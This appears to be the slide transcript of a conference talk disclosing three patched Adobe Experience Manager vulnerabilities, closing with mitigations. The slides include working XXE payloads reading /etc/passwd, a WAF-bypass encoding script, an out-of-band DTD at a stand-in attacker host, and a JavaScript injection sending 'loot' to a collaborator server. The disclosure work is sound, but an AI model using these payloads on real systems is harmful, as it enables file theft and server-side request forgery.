A Hacker's perspective on AEM applications security

A Hacker's perspective on AEM applications security

Adobe Experience Manager (AEM), is a comprehensive content management solution for building websites, managing marketing content and assets. I started to look into AEM security back in 2015. Since then I discovered and reported several server-side vulnerabilities and developed toolset for AEM hacking to automate security testing of AEM web-applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087, CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise AEM web-application.

In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.

0e97d20ff87bf33851da8cadb86affa9?s=128

Mikhail Egorov

September 30, 2020
Tweet

Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE 28th – 30th SEPTEMBER 2020

    A Hacker's perspective on AEM applications security Mikhail Egorov, Security researcher & bug hunter
  2. 2 Intro

  3. whoami 3 ▪ Security researcher & full-time bug hunter ▪

    https://bugcrowd.com/0ang3el ▪ https://hackerone.com/0ang3el ▪ Conference speaker ▪ https://www.slideshare.net/0ang3el ▪ https://speakerdeck.com/0ang3el
  4. whoami 4 ▪ Toolset for AEM hacking ▪ https://github.com/0ang3el/aem-hacker

  5. 5 APSB19-48

  6. APSB19-48 6 ▪ http://helpx.adobe.com/security/products/experi ence-manager/apsb19-48.html ▪ CVE-2019-8086 / XML eXternal

    Entity Injection ▪ CVE-2019-8087 / XML eXternal Entity Injection ▪ CVE-2019-8088 / JavaScript Code Injection
  7. XML eXternal Entity (XXE) attacks 7 ▪ Do we see

    the parsed XML? ▪ What’s allowed by the XML parser? ▪ General external entities ▪ Parameter external entities ▪ External DTD loading
  8. XML eXternal Entity (XXE) attacks 8 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE

    foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> <foo>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync … </foo>
  9. XML eXternal Entity (XXE) attacks 9 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE

    foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:4503"> %xxe; ]> <foo></foo>
  10. XML eXternal Entity (XXE) attacks 10 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE

    foo SYSTEM "http://127.0.0.1:4503" []> <foo></foo>
  11. CVE-2019-8086 11 ▪ GuideInternalSubmitServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value

    = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.methods", value = {"POST"} ), @Property( name = "sling.servlet.selectors", value = {"af.internalsubmit"} )}) public class GuideInternalSubmitServlet …
  12. CVE-2019-8086 12

  13. CVE-2019-8086 13

  14. CVE-2019-8086 14 ▪ XXE payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE afData

    [ <!ENTITY a SYSTEM "file:///etc/passwd"> ]> <afData>&a;</afData>
  15. CVE-2019-8086 15

  16. CVE-2019-8086 16 ▪ Exploitation hints ▪ We can JSON-encode XXE

    payload to bypass a WAF ▪ In Java we can list directory content ▪ /proc/self/cwd
  17. CVE-2019-8086 17 ▪ JSON-encoding data = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE afData

    [<!ENTITY a SYSTEM "file:///etc/passwd">]><afData>&a;</afData>' result = "“ for c in data: result = result + "\\u00%02x" % ord(c) print result
  18. CVE-2019-8086 18

  19. CVE-2019-8086 19 ▪ XXE payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE afData

    [ <!ENTITY a SYSTEM "file:///etc"> ]> <afData>&a;</afData>
  20. CVE-2019-8086 20

  21. CVE-2019-8086 21 ▪ Exploitation requirements ▪ There should be a

    node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/
  22. CVE-2019-8086 22 ▪ Exploitation requirements ▪ Doesn’t work equally on

    different AEM versions ▪ Only blind SSRF for some versions <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE afData SYSTEM "http://localhost:4503" []> <afData></afData>
  23. CVE-2019-8087 23 ▪ WSDLInvokerServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value

    = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.selectors", value = {"af.wsdl"} ), @Property( name = "sling.servlet.methods", value = {"POST"} )}) public class WSDLInvokerServlet …
  24. CVE-2019-8087 24

  25. CVE-2019-8087 25

  26. CVE-2019-8087 26 ▪ WSDL example ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

  27. CVE-2019-8087 27

  28. CVE-2019-8087 28 ▪ Malicious xxe.wsdl <?xml version="1.0"?> <!DOCTYPE definitions [

    <!ENTITY % dtd SYSTEM "http://attacker:1337/loot.dtd"> %dtd; %param1; ]> <definitions name="StockQuote" … <operation name="GetLastTradePrice"> <soap:operation soapAction="&internal;"/> …
  29. CVE-2019-8087 29 ▪ Malicious loot.dtd <!ENTITY % payload SYSTEM "file:///etc/passwd">

    <!ENTITY % param1 "<!ENTITY internal '%payload;'>">
  30. CVE-2019-8087 30

  31. CVE-2019-8087 31 ▪ Exploitation requirements ▪ There should be a

    node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/
  32. CVE-2019-8087 32 ▪ Exploitation requirements ▪ Doesn’t work equally on

    different AEM versions ▪ On some AEM versions WSDLInvokerServlet is not present
  33. CVE-2019-8088 33 ▪ GuideSubmitServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value

    = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.methods", value = {"POST"} ), @Property( name = "sling.servlet.selectors", value = {"af.submit", "af.agreement", "af.signSubmit"} )}) public class GuideSubmitServlet extends SlingAllMethodsServlet { …
  34. CVE-2019-8088 34

  35. CVE-2019-8088 35

  36. CVE-2019-8088 36

  37. CVE-2019-8088 37

  38. CVE-2019-8088 38

  39. CVE-2019-8088 39 ▪ Sandboxed Rhino engine on some AEM versions

    ▪ No RCE ▪ Sandbox allows network interactions ▪ SSRF w/ ability to see the response
  40. CVE-2019-8088 40 ▪ JS payload ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo rator.net');//

  41. CVE-2019-8088 41

  42. CVE-2019-8088 42

  43. CVE-2019-8088 43 ▪ JS payload ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo rator.net',function(data){jQuery.get('http://727a14ifhq8on9vakss k6agtlkrafz.burpcollaborator.net',{loot:data})});//

  44. CVE-2019-8088 44

  45. CVE-2019-8088 45

  46. CVE-2019-8088 46 ▪ Exploitation requirements ▪ There should be a

    node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/
  47. CVE-2019-8088 47 ▪ Exploitation requirements ▪ Doesn’t work equally on

    different AEM versions ▪ RCE or SSRF
  48. APSB19-48 48 ▪ Keep AEM up to date ▪ http://helpx.adobe.com/security/products/experie

    nce-manager/apsb19-48.html ▪ Block jcr:write access for anonymous user ▪ /content/usergenerated/etc/commerce/smartlists/ ▪ Remove demo content (Geometrixx, WeRetail, …)
  49. 49 Thank you @0ang3el